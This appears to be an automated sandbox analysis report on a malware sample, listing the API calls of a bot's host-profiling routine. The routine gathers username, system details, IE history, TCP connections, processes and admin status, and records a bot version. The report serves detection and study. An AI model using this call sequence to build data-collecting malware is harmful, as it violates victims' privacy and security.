                                                                                                                                                                                                            • API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 789118668-0
                                                                                                                                                                                                            • Opcode ID: 80225c1d6a4f6c71f8c48d63022a15f1c35d2d7ca5d08e1c5023d90a16474a06
                                                                                                                                                                                                            • Instruction ID: dc1f79fdc7b93d95cfd731e107797dc6260a562fe6f539b83dde8d70533225b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80225c1d6a4f6c71f8c48d63022a15f1c35d2d7ca5d08e1c5023d90a16474a06
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D014771B861401ADB244A78697077BABBEDF82790B6D02DDF865C7288E721CD009758
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02BCA4FE
                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000), ref: 02BCA505
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(02BCA660,00000008,00000000,02BCA660), ref: 02BCA51F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$CurrentPriorityProtectVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1494777729-0
                                                                                                                                                                                                            • Opcode ID: cc8b4963c8749520315efdce6e33fcc4a12a574b70226ae0bd1eed18ad101a9c
                                                                                                                                                                                                            • Instruction ID: a7ff049d6ebf42c13f048d6cd854432958bef7bc363130dfe03e01b7a327e0cd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc8b4963c8749520315efdce6e33fcc4a12a574b70226ae0bd1eed18ad101a9c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29E065B6E406089FCF10DFD8D84599DB778FB48320F008649FA14A7240C774A920CB60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                            • String ID: v-@
                                                                                                                                                                                                            • API String ID: 3664257935-4190885519
                                                                                                                                                                                                            • Opcode ID: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                            • Instruction ID: 659d1c44b33988b11b994a6559d152e96ecfdb185b9268fc6ed29e1105b0769f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34D05E76E01629CBCB21DF94A5052AEF730FB44731F0043AADE247338083351C118AD5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,02C0D3A4,75775CE0), ref: 02BB4C37
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000001), ref: 02BB4C5E
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB4C6F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{BotVer: ,00000009,02BB3F9D,00000000), ref: 02BB4C7F
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,00000009,00000000), ref: 02BB4C90
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4CA4
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000005,00000000), ref: 02BB4CB1
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,4.1.2,00000005,00000000,00000000), ref: 02BB4CC1
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,00000005,00000000), ref: 02BB4CD2
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4CE6
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4CF3
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4D03
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,00000002,00000000), ref: 02BB4D14
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BB4D28
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4D3C
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 02BB4D49
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Process: ,0000000A,00000000,00000000), ref: 02BB4D59
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,0000000A,00000000), ref: 02BB4D6A
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4D9C
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4DAB
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4DBF
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB4DD2
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4DE6
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4DF3
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4E03
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4E14
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(?,00000104), ref: 02BB4E25
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4E39
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB4E46
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Username: ,0000000B,00000000,00000000), ref: 02BB4E56
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB4E67
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4E92
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4EA1
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4EB5
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4EC8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4EDC
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4EE9
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4EF9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4F0A
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02BB4F21
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4F35
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB4F42
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,00000000,00000000), ref: 02BB4F52
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB4F63
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4F8E
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4F9D
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4FB1
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4FC4
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4FD8
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4FE5
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4FF5
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5006
                                                                                                                                                                                                            • GetSystemDefaultLangID.KERNEL32 ref: 02BB500C
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB5026
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5093
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB50A0
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Language: ,0000000B,00000000,00000000), ref: 02BB50B0
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02BB50C1
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB50EC
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB50FB
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB510F
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5122
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5136
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5143
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB5153
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5164
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 02BB516E
                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 02BB5175
                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 02BB517E
                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 02BB5187
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB519F
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB51B6
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB51C3
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Screen: ,00000009,00000000,00000000), ref: 02BB51D3
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB51E4
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB520F
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB521E
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5232
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5245
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5259
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5266
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB5276
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5287
                                                                                                                                                                                                            • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 02BB52A7
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB52BB
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02BB52C8
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Date: ,00000007,00000000,00000000), ref: 02BB52D8
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02BB52E9
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5314
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5323
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5337
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB534A
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB535E
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB536B
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB537B
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB538C
                                                                                                                                                                                                            • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 02BB53AC
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB53C0
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02BB53CD
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,00000000,00000000), ref: 02BB53DD
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02BB53EE
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB541C
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB542B
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB543F
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5452
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5466
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5473
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB5483
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB5494
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?), ref: 02BB54A1
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB5502
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5519
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02BB5526
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{GMT: ,00000006,00000000,00000000), ref: 02BB5536
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02BB5547
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5572
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5581
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5595
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB55A8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB55BC
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB55C9
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB55D9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB55EA
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB55FE
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB560B
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,00000000,00000000), ref: 02BB561B
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB562C
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB566C
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB567B
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB568C
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02BB569F
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB56B3
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB56C0
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB56D0
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB56E1
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02BB56F3
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5707
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02BB5714
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,00000000,00000000), ref: 02BB5724
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02BB5735
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5760
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB576F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5783
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5796
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB57AA
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB57B7
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB57C7
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB57D8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB57EC
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02BB57F9
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,00000000,00000000), ref: 02BB5809
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02BB581A
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BB5820
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BB5843
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5875
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB5884
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB5895
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB58A8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB58BC
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB58C8
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB58D8
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB58E6
                                                                                                                                                                                                              • Part of subcall function 02BB4900: RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02BB4925
                                                                                                                                                                                                              • Part of subcall function 02BB4900: _snprintf.MSVCRT ref: 02BB494D
                                                                                                                                                                                                              • Part of subcall function 02BB4900: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,76F93490), ref: 02BB4987
                                                                                                                                                                                                              • Part of subcall function 02BB4900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49A9
                                                                                                                                                                                                              • Part of subcall function 02BB4900: LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49B5
                                                                                                                                                                                                              • Part of subcall function 02BB4900: WriteFile.KERNEL32(00000000,IE history:,0000000C,02BB58F1,00000000), ref: 02BB49C9
                                                                                                                                                                                                              • Part of subcall function 02BB4900: UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49D7
                                                                                                                                                                                                              • Part of subcall function 02BB4900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49EB
                                                                                                                                                                                                              • Part of subcall function 02BB4900: LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB49F7
                                                                                                                                                                                                              • Part of subcall function 02BB4900: WriteFile.KERNEL32(00000000,02BF5C1C,00000001,00000000,00000000), ref: 02BB4A0B
                                                                                                                                                                                                              • Part of subcall function 02BB4900: UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB4A19
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,76F93490), ref: 02BB419D
                                                                                                                                                                                                              • Part of subcall function 02BB4180: HeapAlloc.KERNEL32(00000000), ref: 02BB41A0
                                                                                                                                                                                                              • Part of subcall function 02BB4180: memset.MSVCRT ref: 02BB41B4
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB4224
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4232
                                                                                                                                                                                                              • Part of subcall function 02BB4180: HeapValidate.KERNEL32(00000000), ref: 02BB4235
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4242
                                                                                                                                                                                                              • Part of subcall function 02BB4180: HeapFree.KERNEL32(00000000), ref: 02BB4245
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02BB425D
                                                                                                                                                                                                              • Part of subcall function 02BB4180: HeapAlloc.KERNEL32(00000000), ref: 02BB4260
                                                                                                                                                                                                              • Part of subcall function 02BB4180: memset.MSVCRT ref: 02BB4270
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB428A
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4297
                                                                                                                                                                                                              • Part of subcall function 02BB4180: HeapValidate.KERNEL32(00000000), ref: 02BB429A
                                                                                                                                                                                                              • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB42AB
                                                                                                                                                                                                              • Part of subcall function 02BB4180: HeapFree.KERNEL32(00000000), ref: 02BB42AE
                                                                                                                                                                                                              • Part of subcall function 02BB44D0: memset.MSVCRT ref: 02BB4503
                                                                                                                                                                                                              • Part of subcall function 02BB44D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BB450E
                                                                                                                                                                                                              • Part of subcall function 02BB44D0: Process32First.KERNEL32 ref: 02BB4531
                                                                                                                                                                                                              • Part of subcall function 02BB44D0: GetHandleInformation.KERNEL32(00000000,?), ref: 02BB454D
                                                                                                                                                                                                              • Part of subcall function 02BB44D0: CloseHandle.KERNEL32(00000000), ref: 02BB4567
                                                                                                                                                                                                              • Part of subcall function 02BB4710: NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,76F93490,?,?,?,?,02BB5903,00000000), ref: 02BB475A
                                                                                                                                                                                                              • Part of subcall function 02BB4710: GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02BB5903,00000000,00000000,00000000), ref: 02BB47A5
                                                                                                                                                                                                              • Part of subcall function 02BB4710: HeapAlloc.KERNEL32(00000000,?,?,?,?,02BB5903,00000000,00000000,00000000), ref: 02BB47AC
                                                                                                                                                                                                              • Part of subcall function 02BB4710: memset.MSVCRT ref: 02BB47BF
                                                                                                                                                                                                              • Part of subcall function 02BB4710: _snprintf.MSVCRT ref: 02BB480A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB5913
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BB5924
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$LockPointerUnlockWrite$Heap$Process$memset$HandleInformationSecuritySystem_snprintf$AllocDescriptorFreeUser$AdminCloseCreateFormatMetricsNameQueryTableTimeValidate$CapsConvertDateDefaultDeviceDirectoryDisplayEnvironmentFirstInfoLangLocalModuleNamedOpenProcess32SaclSnapshotStringToolhelp32ValueVariableWindowsZone
                                                                                                                                                                                                            • String ID: %c%d:%02d$%dx%d@%d$4.1.2$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                            • API String ID: 2738427392-2715564829
                                                                                                                                                                                                            • Opcode ID: 0cb395f4b5bce665510789361ee3b347671e167ebd4bf2d1c0b05dd604e7978e
                                                                                                                                                                                                            • Instruction ID: 5ccde02bcb3cefbc70dc628a6fa62c2e70b19bc150c9d82681cc1931ee991ba1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cb395f4b5bce665510789361ee3b347671e167ebd4bf2d1c0b05dd604e7978e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EFA2FA70A81318BEFB619B948C4AFEE7B78EF45B04F604584F341BA1C0D7F46A458B69
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 02BBD35F
                                                                                                                                                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 02BBD36A
